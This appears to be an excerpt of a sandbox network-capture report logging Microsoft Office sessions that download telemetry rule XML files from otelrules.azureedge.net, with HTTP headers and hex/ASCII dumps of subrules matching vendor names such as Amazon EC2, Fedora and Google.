                                                                                                                          2024-11-25 15:43:35 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          71192.168.2.44984413.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:35 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:35 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:35 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 479
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                          ETag: "0x8DC582BB7D702D0"
                                                                                                                          x-ms-request-id: c4b984cf-b01e-001e-2446-3c0214000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154335Z-15b8b599d885v8r9hC1TEB104g000000069g000000000gdf
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:35 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          72192.168.2.44984513.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:36 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:36 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:36 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 425
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                          ETag: "0x8DC582BBA25094F"
                                                                                                                          x-ms-request-id: ea4907c4-101e-0079-4064-3d5913000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154336Z-174c587ffdftv9hphC1TEBm29w00000005xg00000000zbq6
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:36 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          73192.168.2.44984613.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:36 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:36 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:36 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 475
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                          ETag: "0x8DC582BB2BE84FD"
                                                                                                                          x-ms-request-id: 974535d3-001e-002b-30bf-3e99f2000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154336Z-178bfbc474bnwsh4hC1NYC2ubs00000007pg00000000n0ez
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:36 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          74192.168.2.44984713.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:37 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:37 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:37 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 448
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                          ETag: "0x8DC582BB389F49B"
                                                                                                                          x-ms-request-id: 2250be27-501e-007b-7961-3b5ba2000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154337Z-178bfbc474bvjk8shC1NYC83ns00000007e000000000nrdf
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:37 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          75192.168.2.44984813.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:37 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:37 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:37 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 491
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                          ETag: "0x8DC582B98B88612"
                                                                                                                          x-ms-request-id: 89d933d2-101e-0028-046e-3c8f64000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154337Z-174c587ffdf7t49mhC1TEB4qbg000000063g000000007kc6
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:37 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          76192.168.2.44984913.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:37 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:38 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:37 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 416
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                          ETag: "0x8DC582BAEA4B445"
                                                                                                                          x-ms-request-id: 15b7cf09-401e-0047-4de4-3e8597000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154337Z-15b8b599d889fz52hC1TEB59as000000062g00000000gkcx
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:38 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          77192.168.2.44985013.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:38 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:39 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:38 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 479
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                          ETag: "0x8DC582B989EE75B"
                                                                                                                          x-ms-request-id: 0aa534f7-c01e-0014-501a-3ea6a3000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154338Z-178bfbc474bxkclvhC1NYC69g400000007r0000000000ea0
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:39 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          78192.168.2.44985213.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:38 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:39 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:39 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 415
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                          ETag: "0x8DC582BA80D96A1"
                                                                                                                          x-ms-request-id: a51f3b57-a01e-0021-27a4-3e814c000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154339Z-178bfbc474b7cbwqhC1NYC8z4n00000007g000000000mzd2
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:39 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          79192.168.2.44985313.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:39 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:39 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 471
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                          ETag: "0x8DC582B97E6FCDD"
                                                                                                                          x-ms-request-id: 15dd4eb7-201e-0051-500a-3d7340000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154339Z-178bfbc474bvjk8shC1NYC83ns00000007kg000000004nv7
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:40 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          80192.168.2.44985413.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:39 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:40 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 419
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                          ETag: "0x8DC582B9C710B28"
                                                                                                                          x-ms-request-id: c2dc1527-b01e-0053-5db2-3bcdf8000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154340Z-174c587ffdf7t49mhC1TEB4qbg000000062000000000cv6f
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:40 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
